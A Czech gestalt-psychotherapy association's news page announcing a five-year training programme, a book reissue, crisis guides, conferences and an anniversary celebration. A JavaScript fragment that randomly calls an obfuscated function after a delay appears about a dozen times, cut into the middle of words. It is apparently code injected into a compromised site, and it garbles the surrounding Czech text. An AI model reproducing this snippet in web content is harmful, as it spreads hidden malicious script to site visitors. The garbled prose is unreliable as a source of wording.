Institut Dialog: Otevíráme novou výcvikovou skupinu

INSTITUT DIALOG NABÍZÍ KOMPLEXNÍ VZDĚLÁVACÍ A VÝCVIKOVÝ PROGRAM PRO PROFESIONÁLY

z oblasti zdravotnictví, psychoterapie a poradenství a jiných pomáhajících profesí, kteří chtějí do své práce pojmout filozofii a metodologii gestalt psychoterapie. Cílem programu je zprostředkovat komplexní psychoterapeutické vzdělání (teoretické, sebezkušenostní a supervizní), založené na gestalt přístupu, a zároveň do terapeutické práce inkorporovat vysoký standard psychoterapeutické kompetence a etiky. Nabízený program je schválen IPVZ pro zdravotnictví. Vedoucí trenérského týmu jsou diplomovaní britskými a americkými instituty GPTI a GATLA. Program je rozložen do 5 let, obsahuje 600 hodin, probíhá 4x ročně v intenzivních čtyřdenních výcvikových blocích.

Cena: 205 Kč / výcviková hodina (nezahrnuje ubytování, stravu a vedlejší náklady výcviku).

Platba: 4x ročně za výcvikový blok.

Předpokládané otevření výcviku: září 2024

Uzávěrka přihlášek: 31. ledna 2024

Prosíme zájemce, aby posílali písemné přihlášky s přílohou profesního a osobního životopisu na info@gestalt-dialog.cz

Podrobné info najdete na www.gestalt-dialog.cz


PHG opět na trhu!

S velkou radostí vám chceme oznámit, že na konci září se vrací na náš knižní trh dlouho očekávané 2 vydání českého překladu základního textu Gestalt terapeutického přístupu – Perls, Hefferline, Goodman: Gestalt terapie, vzrušení a růst lidské osobnosti. Překladatelem a iniciá var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}torem návratu knihy je PhDr. An var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ton Polák. Knihu lze již nyní předobjednat v interne var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tových obchodech.


O krizi pro veřejnost a pro lékaře – šiřte!

V sekci Ke stažení najdete návody pro veřejnost a pro lékaře jak se vyrovnat s aktuální krizí. I když jsou adresovány především těm, kteří jsou dnes „v první linii“, mohou být podpůrné pro nás všechny. Au var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toři, Adam Suchý a Mirek Světlák budou rádi, když je budete šířit mezi své klienty, lékaře, zdravotní sestry a všechny, jichž se aktuální situace dotýká. Děkujeme jim za aktuální a užitečný počin! Všem přejeme hodně sil, zdraví a naděje!


SAVE THE DATE: 7. česká konference Gestalt psychoterapie – 30. 4. – 2. 5. 2021

SAVE THE DATE: 7. česká konference Gestalt psychoterapie

Organizá var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toři 7. české konference Gestalt psychoterapie v roce 2021 zveřejnili první informace:

Termín konání: 30. 4. – 2. 5. 2021

Mís var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}to: Kongres hotel Jezerka, Seč

Téma: Gestalt lásky: člověk – vztah – rodina – skupina

Organizační výbor: IVGT (Ester Neumanová, Alena Vávrová, Magda Hazi), agentura EasyPrague (Veronika Fišerová, Karel Fišer)

Konference je akredi var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tována AKP ČR a ČLK JEP.

Pro aktuální informace doporučujeme sledovat konferenční FB stránku: https://www.facebook.com/gestaltkonference2021/


Oslava 20 let Institutu Dialog

V pátek 24.1. se v Brně sešlo téměř 200 přátel (trenérů, absolventů i frekventantů) Českého institutu pro výcvik v Gestalt psychoterapii DIALOG, aby společně oslavili 20 let od otevření první výcvikové skupiny a od založení institutu. Mnoho účastníků akce je i našimi členy. Nahlédněte…

https://pho var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tos.app.goo.gl/V7gFpu9RqnoFqj6v7

Fo var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}to kredit: Michal Bernátek (www.mypho var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}to.cz)


Call for papers – Gestalt psychoterapie v různých kontextech

Jedinečná publikační příleži var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tost zde https://journals.muni.cz/psychoterapie/pages/view/cfp2020. Edi var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}torem čísla časopisu Psychoterapie, které bude celé věnováno Gestalt psychoterapii je náš předseda, Michal Černík.


Konference HABITAT 2020

Rádi bychom, aby vaší pozornosti neunikla jedinečná konference pořádaná Mexickou národní asociací pro Gestalt s názvem HABITAT 2020. Je možné se jí zúčastnit i on-line, buď formou sledování přímého přenosu, nebo ze záznamu. Lákadlem pro vás mohou být známá jména z naší komunity – Malcolm Parlett, Lynne Jacobs, Liv Estrup, Margherita Spanuolo Lobb, Talia Bar-Yoseph Levine, Jan Roubal a další. Více informací je k dispozici zde: https://www.habitat2020.com.mx/Habitat%20-%20Virtual.html.


Tento web používá k poskytování služeb a analýze návštěvnosti soubory cookie. Používáním tohoto webu s tím souhlasíte. Víc informací

Na těchto internetových stránkách jsou osobní údaje shromažďovány pouze v technicky nezbytné míře. Shromážděné údaje nejsou za žádných okolností prodávány ani jinak poskytovány třetím osobám.

Zavřít